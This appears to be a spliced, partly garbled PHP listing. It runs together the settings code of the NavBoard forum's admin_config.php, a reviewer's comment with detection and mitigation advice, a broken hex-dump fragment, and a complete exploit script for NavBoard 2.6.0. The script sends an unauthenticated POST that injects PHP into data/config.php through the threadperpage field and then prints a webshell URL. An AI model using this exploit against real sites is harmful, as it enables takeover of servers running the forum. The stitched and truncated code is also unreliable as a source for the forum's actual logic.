"; print ""; print ""; print "Main forum settings"; print ""; print "Board Title"; print ""; print ""; print ""; print "Admin email address (blank will not display)"; print ""; print ""; print ""; print "Main website address (NOT forum address, blank will display forum address)"; print ""; print ""; print ""; print "Display text title instead of graphic logo for faster loading
"; print "
"; if($configarray[34]=="on") {print "";} else{print "";} print ""; print "Forums
"; print ""; print "Max levels of subforums to display on one page (less will make for faster loading)
"; print "
"; print ""; print "
"; print "Don't find forum reply count on the fly, recount during posting
(faster forum page, may slow posting slightly)"; print "
"; if($configarray[42]=="on"){ print ""; }else{print "";} print ""; print "Forum/Thread indenting amount
Percentage of title cell used for indent spaing"; print "
"; print "%"; print ""; print "Posts
"; print "
"; print "Seconds before user may add another post (flood control)"; print ""; print ""; print ""; print "Amount of nested bbcodes allowed
(how many times a bbcode tag can be put over itself) 3 is default"; print "
"; print ""; print ""; print "Show names for user levels instead of imageicons:
"; print "
"; if($configarray[45]=="on"){ print ""; }else{ print ""; } print ""; print "Show all edits instead of only last edit on posts
"; print "
"; if($configarray[46]=="on"){ print ""; }else{ print ""; } print ""; print "Registration
"; print "
"; print "Seconds before another account can be registered (flood control)
"; print "
"; print ""; print ""; print "Method of registration
"; print "NOTE: Mailing in php must be setup correctly on your server to work with email confirmation"; print "
"; if($configarray[39]=="on"||$configarray[39]==""){ print " "; }else{ print " "; } print "Allowed
"; if($configarray[39]=="confirm"){ print " "; }else{ print " "; } print "Email confirmed
"; if($configarray[39]=="approve"){ print " "; }else{ print " "; } print "Admin approved"; print "
"; print "Profiles"; print ""; print "Allow duplicate display names
"; print "
"; if($configarray[32]=="on"){ print ""; }else{ print ""; } print ""; print "Display name changing
"; print "
"; if($configarray[41]=="off"){ print " "; }else{ print " "; } print "Not allowed
"; if($configarray[41]=="on"||$configarray[41]==""){ print " "; }else{ print " "; } print "Allowed
"; if($configarray[41]=="approve"){ print " "; }else{ print " "; } print "Admin approved"; print "
"; print "Default time format (php date format) "; print "Recommended: n-j-Y h:iA
"; print "
"; print ""; print ""; print "Max people on individual users buddy lists"; print ""; print ""; print ""; print "Avatars
"; print "
"; print "Avatar file size limit (bytes)
"; print "
"; print "
"; print ""; print "Avatar dimensions limit (height)x(width)
"; print "
"; print "
"; print ""; print "Attachments"; print ""; print "Allowed attachment extensions (separated by commas) (blank would allow no attachments)
"; print "
"; print ""; print ""; print "Max size of attachments (in bytes)
"; print "
"; print ""; print ""; print "Max total size of all attachments (in bytes)
"; print "
"; print ""; print ""; print "Polls"; print ""; print "Max poll options
"; print "
"; print ""; print ""; print "Theme
"; print ""; print "Default theme
"; print "
"; $themesarray=listdirs("themes"); print ""; print ""; print "Online users
"; print ""; print "Seconds of inactivity before user is removed from online list (300seconds=5minutes)
"; print "
"; print ""; print ""; print "Page settings"; print ""; print "Threads to show per page in forum
"; print "
"; print "
"; print ""; print "Posts to show per page in thread
"; print "
"; print "
"; print ""; print "Max character settings
"; print ""; print "Max total characters in body of posts
"; print "
"; print "
"; print ""; print "Max total characters in subject of posts
"; print "
"; print "
"; print ""; print "Max total characters in signatures
"; print "
"; print "
"; print ""; print "Enabling/Disabling"; print ""; print "Allow HTML in posts:
"; print "
"; if($configarray[14]=="allowhtml"){ print ""; }else{ print ""; } print ""; print "Enable GZ Compression:
"; print "
"; if($configarray[21]=="disablegz"){ print ""; }else{ print ""; } print ""; print "Private Messaging
"; print ""; print "Max total size of pms per user (bytes)
"; print "
"; print "
"; print ""; print "Max total number of pms per user
"; print "
"; print "
"; print ""; print "Board Closing"; print ""; print "Entering info here will cause the entire bulletin board to be closed
"; print "This is the message that shows up when the board is closed
"; print "
"; print "
"; print ""; print ""; print ""; print ""; print ""; print ""; print ""; } if($editconfig){ $boardtitle=stripslashes($boardtitle); $boardtitle=htmlentities($boardtitle); writedata("$maindatadir/config.php",$boardtitle,0); writedata("$maindatadir/config.php",$threadperpage,7); writedata("$maindatadir/config.php",$postperpage,8); writedata("$maindatadir/config.php",$avatarfilesize,9); writedata("$maindatadir/config.php",$avatardimension,10); writedata("$maindatadir/config.php",$defaulttheme,12); writedata("$maindatadir/config.php",$inactivityseconds,13); if($html=="on"){ writedata("$maindatadir/config.php","allowhtml",14); }else{ writedata("$maindatadir/config.php","denyhtml",14); } writedata("$maindatadir/config.php",$maxcharsbody,18); writedata("$maindatadir/config.php",$maxcharssigs,19); if($gzcompress=="on"){ writedata("$maindatadir/config.php","enablegz",21); }else{ writedata("$maindatadir/config.php","disablegz",21); } writedata("$maindatadir/config.php",$allowedattachext,22); writedata("$maindatadir/config.php",$maxattachsize,23); writedata("$maindatadir/config.php",$maxpolloptions,24); writedata("$maindatadir/config.php",$maxcharssubject,25); writedata("$maindatadir/config.php",$maxsubforumdisplay,27); writedata("$maindatadir/config.php",$buddylistmax,28); writedata("$maindatadir/config.php",$maxpmsize,29); writedata("$maindatadir/config.php",$maxpmnumber,30); writedata("$maindatadir/config.php",$maxtotalattachsize,31); writedata("$maindatadir/config.php",$allowdupdisplay,32); writedata("$maindatadir/config.php",$defaulttime,33); writedata("$maindatadir/config.php",$textlogo,34); writedata("$maindatadir/config.php",$adminemail,35); writedata("$maindatadir/config.php",$mainwebsite,36); writedata("$maindatadir/config.php",$postfloodcontrolsec,37); writedata("$maindatadir/config.php",$regfloodcontrolsec,38); writedata("$maindatadir/config.php",$registration,39); writedata("$maindatadir/config.php",$boardclosing,40); 
/*
 * NOTE(review): two different sources are run together here and the text was
 * damaged by extraction. The code below is kept exactly as found; only this
 * comment is added.
 *
 * 1. Up to "make a recount": the end of the settings-save branch of the
 *    forum's admin_config.php (it opens with if($editconfig) on the previous
 *    line of the listing). Each setting is stored with writedata() into
 *    "$maindatadir/config.php", which is a PHP file. In the visible code only
 *    $boardtitle is passed through stripslashes()/htmlentities(); every other
 *    value, including ones that should be plain numbers such as
 *    $threadperpage, is written without a visible check. The variables are
 *    presumably filled from request fields of the same names (the POST body
 *    further down uses exactly those names) -- confirm against the full file.
 *    No access check is visible in this excerpt; whether one exists earlier
 *    in the file cannot be told from here.
 *
 * 2. "for($n=0;$n 126 ))": text was lost at this point. What follows, up to
 *    "return $exa...", appears to be the end of a hex-dump helper whose
 *    beginning is missing.
 *
 * 3. From $proxy_regex to the end: a command-line proof of concept whose
 *    banner names NavBoard 2.6.0. It builds one multipart POST to
 *    <path>admin_config.php containing an "editconfig" field and a
 *    "threadperpage" value that holds a double quote and an include
 *    statement instead of a number, sends it with sendpacket(), and then
 *    prints a data/config.php URL with a "shell" parameter. The request it
 *    builds carries no Cookie or Authorization header. make_seed(), $cmd and
 *    $p are set up but not used in the visible code.
 *
 * Detection, from what the request looks like on this page:
 *   - POST to admin_config.php from a client with no admin session;
 *   - a non-numeric "threadperpage" (or any numeric setting) in the form
 *     data, especially one containing quotes or "include";
 *   - a later request to data/config.php carrying a "shell" parameter;
 *   - an unexpected change to data/config.php (file-integrity monitoring);
 *   - HTTP/1.0 with the fixed MSIE 7.0 User-Agent below is a weak indicator
 *     only, since it is trivial to change.
 *
 * Mitigation for the save branch: check the admin session before any
 * writedata() call, cast or range-check numeric settings and allow-list the
 * enumerated ones, keep settings in a file the web server will not execute
 * (or block direct requests to the data directory), and run PHP with
 * register_globals and allow_url_include off.
 */
writedata("$maindatadir/config.php",$displaychange,41); if($configarray[42]!=="on"&&$dontscanreplycount=="on"){//if turning on for first time, make a recount for($n=0;$n 126 )) {$result.=" .";} else {$result.=" ".$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));} else {$exa.=" 0".dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} } return $exa."\r\n".$result; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function sendpacket($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo 'Not a valid proxy...';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); } function make_seed() { list($usec, $sec) = explode(' ', microtime()); return (float) $sec + ((float) $usec * 100000); } $host=$argv[1]; $path=$argv[2]; $port=80; $proxy=""; for ($i=7; $i<$argc; $i++){ $temp=$argv[$i][0].$argv[$i][1]; if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];} if ($temp=="-p") { $port=str_replace("-p","",$argv[$i]); } if ($temp=="-P") { $proxy=str_replace("-P","",$argv[$i]); } } if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} /*Data*/ $data.='-----------------------------7d6224c08dc Content-Disposition: form-data; name="editconfig" -----------------------------7d6224c08dc Content-Disposition: form-data; name="boardtitle" Dj7xpl -----------------------------7d6224c08dc Content-Disposition: form-data; 
name="threadperpage" www\";include \"\$shell\";\/\/ -----------------------------7d6224c08dc Content-Disposition: form-data; name="postperpage" Dj7xpl -----------------------------7d6224c08dc Content-Disposition: form-data; name="avatarfilesize" 11 -----------------------------7d6224c08dc Content-Disposition: form-data; name="avatardimension" 123 -----------------------------7d6224c08dc Content-Disposition: form-data; name="defaulttheme" red -----------------------------7d6224c08dc Content-Disposition: form-data; name="inactivityseconds" #CCFF00 -----------------------------7d6224c08dc Content-Disposition: form-data; name="html" on -----------------------------7d6224c08dc Content-Disposition: form-data; name="maxcharsbody" 111 -----------------------------7d6224c08dc Content-Disposition: form-data; name="maxcharssigs" 11122 -----------------------------7d6224c08dc Content-Disposition: form-data; name="gzcompress" on -----------------------------7d6224c08dc Content-Disposition: form-data; name="allowedattachext" red -----------------------------7d6224c08dc Content-Disposition: form-data; name="maxattachsize" red -----------------------------7d6224c08dc Content-Disposition: form-data; name="maxpolloptions" red -----------------------------7d6224c08dc Content-Disposition: form-data; name="maxcharssubject" red -----------------------------7d6224c08dc Content-Disposition: form-data; name="maxsubforumdisplay" red -----------------------------7d6224c08dc Content-Disposition: form-data; name="buddylistmax" red -----------------------------7d6224c08dc Content-Disposition: form-data; name="maxpmsize" Dj7xpl -----------------------------7d6224c08dc Content-Disposition: form-data; name="maxpmnumber" Dj7xpl -----------------------------7d6224c08dc Content-Disposition: form-data; name="maxtotalattachsize" red -----------------------------7d6224c08dc Content-Disposition: form-data; name="allowdupdisplay" red -----------------------------7d6224c08dc Content-Disposition: form-data; 
name="defaulttime" red -----------------------------7d6224c08dc Content-Disposition: form-data; name="textlogo" red -----------------------------7d6224c08dc Content-Disposition: form-data; name="adminemail" red -----------------------------7d6224c08dc Content-Disposition: form-data; name="mainwebsite" red -----------------------------7d6224c08dc Content-Disposition: form-data; name="postfloodcontrolsec" red -----------------------------7d6224c08dc Content-Disposition: form-data; name="regfloodcontrolsec" red -----------------------------7d6224c08dc Content-Disposition: form-data; name="registration" red -----------------------------7d6224c08dc Content-Disposition: form-data; name="boardclosing" red -----------------------------7d6224c08dc Content-Disposition: form-data; name="displaychange" red -----------------------------7d6224c08dc Content-Disposition: form-data; name="replies" red -----------------------------7d6224c08dc Content-Disposition: form-data; name="dontscanreplycount" red -----------------------------7d6224c08dc Content-Disposition: form-data; name="nestedbbcodes" red -----------------------------7d6224c08dc Content-Disposition: form-data; name="indentspacing" red -----------------------------7d6224c08dc Content-Disposition: form-data; name="userlevelnames" red -----------------------------7d6224c08dc Content-Disposition: form-data; name="showalledits" red -----------------------------7d6224c08dc '; /*Echo Header*/ echo "[!] NavBoard 2.6.0\r\n"; echo "[!] Powered By Y! Underground Group\r\n"; echo "[!] 
Vuln And Coded By Dj7xpl\r\n"; /*Sending Data*/ $packet ="POST ".$path."admin_config.php HTTP/1.0\r\n"; $packet.="Content-Type: multipart/form-data; boundary=---------------------------7d6224c08dc\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Accept-Language: en\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"; $packet.="Connection: Close\r\n\r\n"; $packet.=$data; sendpacket($packet); sleep(2); Echo "[!] Shell : http://".$host.$path."data/config.php?shell=Evil Text\r\n"; ?>